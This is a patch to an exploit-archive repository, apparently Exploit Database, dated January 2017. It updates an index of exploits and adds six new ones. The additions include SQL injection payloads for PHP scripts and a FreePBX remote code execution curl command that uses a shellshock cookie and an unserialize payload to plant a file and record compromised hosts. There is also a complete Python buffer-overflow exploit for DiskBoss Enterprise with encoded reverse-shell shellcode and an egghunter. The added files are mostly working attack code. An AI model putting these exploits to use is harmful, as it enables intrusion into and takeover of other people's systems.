From 1b13c8a790f462666b663f933f1eb8beaf88ac2d Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 11 Jan 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-01-11 6 new exploits DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH) ClaSS 0.8.60 - (export.php ftype) Local File Inclusion ClaSS 0.8.60 - 'export.php' Local File Inclusion Miniweb 2.0 - SQL Injection (Authentication Bypass) Miniweb 2.0 - Authentication Bypass eDNews 2.0 - (lg) Local File Inclusion eDContainer 2.22 - (lg) Local File Inclusion eDNews 2.0 - Local File Inclusion eDContainer 2.22 - Local File Inclusion Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection Ultimate PHP Board 2.2.1 - Privilege Escalation Sepcity Shopping Mall - SQL Injection Sepcity Lawyer Portal - SQL Injection Sepcity Classified - 'classdis.asp ID' SQL Injection FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection Flexphplink 0.0.x - (Authentication Bypass) SQL Injection eDNews 2.0 - (eDNews_view.php newsid) SQL Injection Sepcity Classified - 'ID' Parameter SQL Injection FlexPHPDirectory 0.0.1 - Authentication Bypass Flexphpsite 0.0.1 - Authentication Bypass Flexphplink 0.0.x - Authentication Bypass eDNews 2.0 - SQL Injection PHPAlumni - 'Acomment.php id' SQL Injection PHPAlumni - SQL Injection Flexphpic 0.0.x - (Authentication Bypass) SQL Injection Flexphpic 0.0.x - Authentication Bypass Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection Mole Group Vacation Estate Listing Script - Blind SQL Injection Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass) Friends in War Make or Break 1.3 - Authentication Bypass My Php Dating 2.0 - 'path' Parameter SQL Injection My Php Dating 2.0 - 'id' Parameter SQL Injection My PHP Dating 2.0 - 'path' Parameter SQL Injection My PHP Dating 2.0 - 'id' Parameter SQL Injection Friends in War Make or Break 1.7 - 'imgid' Parameter SQL 
Injection Starting Page 1.3 - SQL Injection Freepbx < 2.11.1.5 - Remote Code Execution WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)
---
 files.csv | 42 +++++++++++---------
 platforms/php/webapps/41002.txt | 42 ++++++++++++++++++++
 platforms/php/webapps/41004.txt | 22 +++++++++++
 platforms/php/webapps/41005.txt | 37 +++++++++++++++++
 platforms/php/webapps/41006.txt | 24 +++++++++++
 platforms/php/webapps/41007.html | 32 +++++++++++++++
 platforms/windows/remote/41003.py | 66 +++++++++++++++++++++++++++++++
 7 files changed, 247 insertions(+), 18 deletions(-)
 create mode 100755 platforms/php/webapps/41002.txt
 create mode 100755 platforms/php/webapps/41004.txt
 create mode 100755 platforms/php/webapps/41005.txt
 create mode 100755 platforms/php/webapps/41006.txt
 create mode 100755 platforms/php/webapps/41007.html
 create mode 100755 platforms/windows/remote/41003.py
diff --git a/files.csv b/files.csv
index bde0ceab5..a8185cb52 100644
--- a/files.csv
+++ b/files.csv
@@ -15204,6 +15204,7 @@ id,file,description,date,author,platform,type,port
 40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
 40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0
 40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
+41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -20356,9 +20357,9 @@ id,file,description,date,author,platform,type,port
 7574,platforms/php/webapps/7574.txt,"Joomla! Component mDigg 2.2.8 - 'category' Parameter SQL Injection",2008-12-24,boom3rang,php,webapps,0
 7575,platforms/php/webapps/7575.pl,"Joomla! Component 5starhotels - SQL Injection",2008-12-24,EcHoLL,php,webapps,0
 7576,platforms/php/webapps/7576.pl,"PHP-Fusion 7.0.2 - Blind SQL Injection",2008-12-24,StAkeR,php,webapps,0
-7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0
+7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - 'export.php' Local File Inclusion",2008-12-24,fuzion,php,webapps,0
 7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - 'lang' Local File Inclusion",2008-12-24,fuzion,php,webapps,0
-7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - SQL Injection (Authentication Bypass)",2008-12-28,bizzit,php,webapps,0
+7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - Authentication Bypass",2008-12-28,bizzit,php,webapps,0
 7587,platforms/php/webapps/7587.txt,"Joomla! Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,php,webapps,0
 7593,platforms/php/webapps/7593.pl,"DeluxeBB 1.2 - Blind SQL Injection",2008-12-28,StAkeR,php,webapps,0
 7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Authentication Bypass",2008-12-28,k3yv4n,php,webapps,0
@@ -20369,26 +20370,26 @@ id,file,description,date,author,platform,type,port
 7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,php,webapps,0
 7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0
 7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Authentication Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0
-7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
-7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
+7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
+7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
 7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,php,webapps,0
 7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 - Authentication Bypass Change User Password",2008-12-29,R31P0l,php,webapps,0
-7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation",2008-12-29,StAkeR,php,webapps,0
-7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
-7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
+7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - Privilege Escalation",2008-12-29,StAkeR,php,webapps,0
+7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
+7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
 7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection",2008-12-29,s4avrd0w,php,webapps,0
 7612,platforms/php/webapps/7612.txt,"Joomla! Component com_na_content 1.0 - Blind SQL Injection",2008-12-29,"Mehmet Ince",php,webapps,0
-7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'classdis.asp ID' SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0
-7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
-7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
-7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
-7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - (eDNews_view.php newsid) SQL Injection",2008-12-29,"Virangar Security",php,webapps,0
+7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'ID' Parameter SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0
+7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0
+7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0
+7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - Authentication Bypass",2008-12-29,x0r,php,webapps,0
+7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - SQL Injection",2008-12-29,"Virangar Security",php,webapps,0
 7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary File Upload",2008-12-29,siurek22,php,webapps,0
-7621,platforms/php/webapps/7621.txt,"PHPAlumni - 'Acomment.php id' SQL Injection",2008-12-29,Mr.SQL,php,webapps,0
+7621,platforms/php/webapps/7621.txt,"PHPAlumni - SQL Injection",2008-12-29,Mr.SQL,php,webapps,0
 7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0
-7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - (Authentication Bypass) SQL Injection",2008-12-30,S.W.A.T.,php,webapps,0
+7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - Authentication Bypass",2008-12-30,S.W.A.T.,php,webapps,0
 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps,0
-7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0
+7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - Blind SQL Injection",2008-12-30,x0r,php,webapps,0
 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0
 7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0
 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0
@@ -26240,7 +26241,7 @@ id,file,description,date,author,platform,type,port
 22730,platforms/asp/webapps/22730.txt,"Mailtraq 2.2 - Browse.asp Cross-Site Scripting",2003-06-04,"Ziv Kamir",asp,webapps,0
 22731,platforms/asp/webapps/22731.txt,"Mailtraq 2.2 - Webmail Utility Full Path Disclosure",2003-06-04,"Ziv Kamir",asp,webapps,0
 22735,platforms/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps,0
-22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass)",2012-11-15,d3b4g,php,webapps,0
+22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - Authentication Bypass",2012-11-15,d3b4g,php,webapps,0
 22741,platforms/php/webapps/22741.txt,"BabyGekko 1.2.2e - Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",php,webapps,0
 22742,platforms/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,cr4wl3r,php,webapps,0
 22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - Admin.cgi Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0
@@ -36941,5 +36942,10 @@ id,file,description,date,author,platform,type,port
 40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
 40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
 40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0
-40999,platforms/php/webapps/40999.txt,"My Php Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
-41001,platforms/php/webapps/41001.txt,"My Php Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
+40999,platforms/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
+41001,platforms/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
+41002,platforms/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection",2017-01-09,v3n0m,php,webapps,0
+41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - SQL Injection",2017-01-10,JaMbA,php,webapps,0
+41005,platforms/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,php,webapps,0
+41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0
+41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/41002.txt b/platforms/php/webapps/41002.txt
new file mode 100755
index 000000000..01cdd2a6e
--- /dev/null
+++ b/platforms/php/webapps/41002.txt
@@ -0,0 +1,42 @@ +# Exploit : Make or Break 1.7 (imgid) SQL Injection Vulnerability +# Author : v3n0m +# Contact : v3n0m[at]outlook[dot]com +# Date : January, 09-2017 GMT +7:00 Jakarta, Indonesia +# Software : Make or Break +# Version : 1.7 Lower versions may also be affected +# License : Free +# Download : http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9 +# Credits : YOGYACARDERLINK, Dhea Fathin Karima & YOU !! + +1. Description + +An attacker can exploit this vulnerability to read from the database. +The parameter 'imgid' is vulnerable. + + +2. Proof of Concept + +http://domain.tld/[path]/index.php?imgid=-9999+union+all+select+null,null,null,null,version(),null-- + +# Exploitation via SQLMap + +Parameter: imgid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: imgid=1 AND 4688=4688 + Vector: AND [INFERENCE] + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: imgid=1 OR SLEEP(2) + Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + Type: UNION query + Title: Generic UNION query (NULL) - 11 columns + Payload: imgid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176786271,0x746264586d76465246657a5778446f756c6d696859494e7247735476506447726470676f4e544c59,0x71706b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WQyQ + Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT] + + +3. Security Risk + +The security risk of the remote sql-injection web vulnerability in the Make or Break CMS is estimated as high. \ No newline at end of file diff --git a/platforms/php/webapps/41004.txt b/platforms/php/webapps/41004.txt new file mode 100755 index 000000000..c11646b06 --- /dev/null +++ b/platforms/php/webapps/41004.txt 
@@ -0,0 +1,22 @@ +# Vulnerability: Starting Page- SQL Injection + +# Date: 10.01.2017 + +# Vendor Homepage: http://software.friendsinwar.com/ + +# Tested on: win10 + +# Author: JaMbA + +# Script link: http://software.friendsinwar.com/news.php?readmore=31 + +######################### + + +# SQL Injection/Exploit : + +# Vulnerable Parametre : linkid + +# http://localhost/[PATH]/outgoing.php?linkid=[SQL] + +Tunisia 4 ever diff --git a/platforms/php/webapps/41005.txt b/platforms/php/webapps/41005.txt new file mode 100755 index 000000000..bac5aa8a5 --- /dev/null +++ b/platforms/php/webapps/41005.txt 
@@ -0,0 +1,37 @@ +Exploit Title: Freepbx coockie recordings injection +Google Dork: Ask Santa +Date: 23/12/2016 +Exploit Author: inj3ctor3 +Vendor Homepage: https://www.freepbx.org/ +Software Link: ISO LINKS IN SITE https://www.freepbx.org/ +Version: ALL && unpatched/ (Trixbox/freepbx/elastix/pbxinflash/) +Tested on: Centos 6 +CVE : CVE-2014-7235 + +1. Description + +a critical Zero-Day Remote Code Execution and Privilege Escalation +exploit within the legacy “FreePBX ARI Framework module/Asterisk +Recording Interface (ARI)”. +htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x, +and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth coockie, +related to the PHP unserialize function + + + +A successful attack may compromise the whole system aiding the hacker to gain + +further privileges via taking advantage of famous nmap shell + +without further or do this is a poc code + +curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null + +if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi + \ No newline at end of file 
diff --git a/platforms/php/webapps/41006.txt b/platforms/php/webapps/41006.txt new file mode 100755 index 000000000..7c5f22502 --- /dev/null +++ b/platforms/php/webapps/41006.txt @@ -0,0 +1,24 @@ +# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation +# Date: 10-01-2017 +# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/ +# Exploit Author: Kacper Szurek +# Contact: http://twitter.com/KacperSzurek +# Website: http://security.szurek.pl/ +# Category: web + +1. Description + +You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie(). + +http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html + +2. Proof of Concept + +
+ Username: + + + +
+ +Then you can go to admin panel. \ No newline at end of file diff --git a/platforms/php/webapps/41007.html b/platforms/php/webapps/41007.html new file mode 100755 index 000000000..411aa9bc5 --- /dev/null +++ b/platforms/php/webapps/41007.html @@ -0,0 +1,32 @@ +# # # # # +# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...) +# Google Dork: FMyLife Clone Script +# Date:10.01.2017 +# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm +# Tested on: http://www.tellaboutit.com/admin/ +# Script Name: FMyLife Clone Script (Pro Edition) +# Script Version: 1.1 +# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/ +# Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +#Exploit : + + +

Add an Administrator

+
+
+ + + +
+ + +
+ +
+
+ + +# # # # # diff --git a/platforms/windows/remote/41003.py b/platforms/windows/remote/41003.py new file mode 100755 index 000000000..613d522b8 --- /dev/null +++ b/platforms/windows/remote/41003.py 
@@ -0,0 +1,66 @@ +#!/usr/bin/python + +# Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow +# Date: 10-01-2017 +# Exploit Author: Wyndell Bibera +# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe +# Version: 7.5.12 +# Tested on: Windows XP Professional SP3 + +import socket + +ip = "192.168.86.150" +port = 80 + +egg = "ezggezgg" +nopslide = "\x90" * 8 + +# Bad characters: \x00\x09\x0a\x0d\x20 +# Reverse Shell @ Port 443 - Change shellcode section accordingly +shellcode = ("\xb8\x45\x49\xe1\x98\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9\xb1" +"\x52\x31\x47\x12\x03\x47\x12\x83\x82\x4d\x03\x6d\xf0\xa6\x41" +"\x8e\x08\x37\x26\x06\xed\x06\x66\x7c\x66\x38\x56\xf6\x2a\xb5" +"\x1d\x5a\xde\x4e\x53\x73\xd1\xe7\xde\xa5\xdc\xf8\x73\x95\x7f" +"\x7b\x8e\xca\x5f\x42\x41\x1f\x9e\x83\xbc\xd2\xf2\x5c\xca\x41" +"\xe2\xe9\x86\x59\x89\xa2\x07\xda\x6e\x72\x29\xcb\x21\x08\x70" +"\xcb\xc0\xdd\x08\x42\xda\x02\x34\x1c\x51\xf0\xc2\x9f\xb3\xc8" +"\x2b\x33\xfa\xe4\xd9\x4d\x3b\xc2\x01\x38\x35\x30\xbf\x3b\x82" +"\x4a\x1b\xc9\x10\xec\xe8\x69\xfc\x0c\x3c\xef\x77\x02\x89\x7b" +"\xdf\x07\x0c\xaf\x54\x33\x85\x4e\xba\xb5\xdd\x74\x1e\x9d\x86" +"\x15\x07\x7b\x68\x29\x57\x24\xd5\x8f\x1c\xc9\x02\xa2\x7f\x86" +"\xe7\x8f\x7f\x56\x60\x87\x0c\x64\x2f\x33\x9a\xc4\xb8\x9d\x5d" +"\x2a\x93\x5a\xf1\xd5\x1c\x9b\xd8\x11\x48\xcb\x72\xb3\xf1\x80" +"\x82\x3c\x24\x06\xd2\x92\x97\xe7\x82\x52\x48\x80\xc8\x5c\xb7" +"\xb0\xf3\xb6\xd0\x5b\x0e\x51\x1f\x33\x46\x2d\xf7\x46\x66\x2c" +"\xb3\xce\x80\x44\xd3\x86\x1b\xf1\x4a\x83\xd7\x60\x92\x19\x92" +"\xa3\x18\xae\x63\x6d\xe9\xdb\x77\x1a\x19\x96\x25\x8d\x26\x0c" +"\x41\x51\xb4\xcb\x91\x1c\xa5\x43\xc6\x49\x1b\x9a\x82\x67\x02" +"\x34\xb0\x75\xd2\x7f\x70\xa2\x27\x81\x79\x27\x13\xa5\x69\xf1" +"\x9c\xe1\xdd\xad\xca\xbf\x8b\x0b\xa5\x71\x65\xc2\x1a\xd8\xe1" +"\x93\x50\xdb\x77\x9c\xbc\xad\x97\x2d\x69\xe8\xa8\x82\xfd\xfc" +"\xd1\xfe\x9d\x03\x08\xbb\xae\x49\x10\xea\x26\x14\xc1\xae\x2a" +"\xa7\x3c\xec\x52\x24\xb4\x8d\xa0\x34\xbd\x88\xed\xf2\x2e\xe1" 
+"\x7e\x97\x50\x56\x7e\xb2") +scpad = "\x90" * (2480 - len(shellcode) - len(nopslide)) +shortjmp = "\xeb\x0f\x90\x90" + +# Search for string 'ezgg' twice +egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +"\xef\xb8\x65\x7a\x67\x67\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") + +extra = "\x90" * 9 +pad = "\x90" * (5000 - len(extra) - 2496 - len(egghunter)) + +# POP POP RET Instruction +seh = "\x6b\xa6\x02\x10" + +buffer = ( +"POST " + egg + nopslide + shellcode + scpad + shortjmp + seh + extra + egghunter + pad + " HTTP/1.1\r\n" +"Host: :192.168.86.150\r\n" +"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" +"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/* ;q=0.8\r\n\r\n") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((ip, port)) +s.send(buffer) +s.close()